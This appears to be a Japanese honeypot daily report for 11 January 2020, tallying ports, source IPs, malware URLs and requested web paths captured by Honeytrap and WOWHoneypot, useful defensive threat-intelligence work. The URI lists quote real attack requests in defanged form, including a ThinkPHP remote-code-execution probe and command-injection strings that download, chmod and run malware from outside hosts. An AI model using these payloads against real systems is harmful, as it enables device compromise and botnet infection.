【ハニーポット簡易分析】Honeypot簡易分析(2020/01/11)
2020/01/11 の簡易分析となります。今回は、Microsoft SQL Serverで利用されているポート1433宛への通信が増加していました。
Honeypot簡易分析
<Honeytrap>
Local Port Top 10
LocalPort Count
1433 133228 件
445 214 件
3333 125 件
3389 68 件
6443 42 件
161 38 件
5094 38 件
139 27 件
Remote IP Top 10
RemoteIP Count
93[.]81[.]67[.]97 19329 件
125[.]227[.]26[.]167 18331 件
36[.]228[.]72[.]130 17251 件
190[.]77[.]63[.]145 16870 件
125[.]209[.]15[.]131 12950 件
177[.]7[.]73[.]136 11113 件
180[.]249[.]56[.]141 10843 件
187[.]53[.]123[.]169 7562 件
Malware Count
No Malware 134404 件
http://51[.]77[.]213[.]109/mips 5 件
http://185[.]62[.]189[.]18/jaws[.]sh 1 件
<WOWHoneypot>
URI Path Top 10
URI Path Count
/ 23 件
/admin/assets/js/views/login[.]js 16 件
/admin/i18n/readme[.]txt 8 件
/recordings/theme/main[.]css 8 件
/admin/config[.]php 8 件
/a2billing/customer/templates/default/css/menu[.]css 8 件
/TP/public/index[.]php 3 件
ip[.]ws[.]126[.]net:443 2 件
Remote IP Top 10
RemoteIP Count
77[.]247[.]108[.]77 40 件
77[.]247[.]108[.]119 8 件
146[.]71[.]79[.]77 6 件
50[.]192[.]246[.]94 5 件
106[.]12[.]123[.]62 4 件
78[.]151[.]188[.]234 3 件
112[.]25[.]224[.]2 3 件
222[.]186[.]19[.]221 2 件
All URI
URI Count
/ 22 件
/admin/assets/js/views/login[.]js 16 件
/admin/i18n/readme[.]txt 8 件
/recordings/theme/main[.]css 8 件
/admin/config[.]php 8 件
/a2billing/customer/templates/default/css/menu[.]css 8 件
ip[.]ws[.]126[.]net:443 2 件
/robots[.]txt 2 件
/muieblackcat 1 件
//phpMyAdmin/scripts/setup[.]php 1 件
//phpmyadmin/scripts/setup[.]php 1 件
//pma/scripts/setup[.]php 1 件
//myadmin/scripts/setup[.]php 1 件
//MyAdmin/scripts/setup[.]php 1 件
/TP/public/index[.]php 1 件
/TP/public/index[.]php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1 1 件
/TP/public/index[.]php?s=captcha 1 件
/setup[.]cgi?next_file=afr[.]cfg&todo=syscmd&cmd=wget hxxp://91[.]208[.]184[.]71/Hentai[.]mips -O /var/tmp/Hentai[.]mips; chmod 777 /var/tmp/Hentai[.]mips; /var/tmp/Hentai[.]mips; rm -rf /var/tmp/Hentai[.]mips&curpath=/¤tsetting[.]htm=1 1 件
/card_scan_decoder[.]php?No=30&door=`wget hxxp://switchnets[.]net/hoho[.]arm7; chmod 777 hoho[.]arm7; [.]/hoho[.]arm7 linear` 1 件
/?XDEBUG_SESSION_START=phpstorm 1 件
/struts2-rest-showcase/orders[.]xhtml 1 件
/index[.]action 1 件
/index[.]do 1 件
<WOWHoneypot(https)>
URI Path Top 10
URI Path Count
/admin/assets/js/views/login[.]js 16 件
/admin/i18n/readme[.]txt 8 件
/recordings/theme/main[.]css 8 件
/admin/config[.]php 8 件
/a2billing/customer/templates/default/css/menu[.]css 8 件
/ 6 件
/ajax 1 件
/images/logo_pan_158[.]gif 1 件
Remote IP Top 10
RemoteIP Count
77[.]247[.]108[.]77 40 件
77[.]247[.]108[.]119 8 件
172[.]105[.]89[.]161 1 件
139[.]162[.]189[.]189 1 件
128[.]14[.]133[.]58 1 件
139[.]162[.]113[.]204 1 件
92[.]118[.]160[.]13 1 件
184[.]105[.]139[.]69 1 件
All URI
URI Count
/admin/assets/js/views/login[.]js 16 件
/admin/i18n/readme[.]txt 8 件
/recordings/theme/main[.]css 8 件
/admin/config[.]php 8 件
/a2billing/customer/templates/default/css/menu[.]css 8 件
/ 6 件
/ajax 1 件
/images/logo_pan_158[.]gif 1 件
/global-protect/portal/css/login[.]css 1 件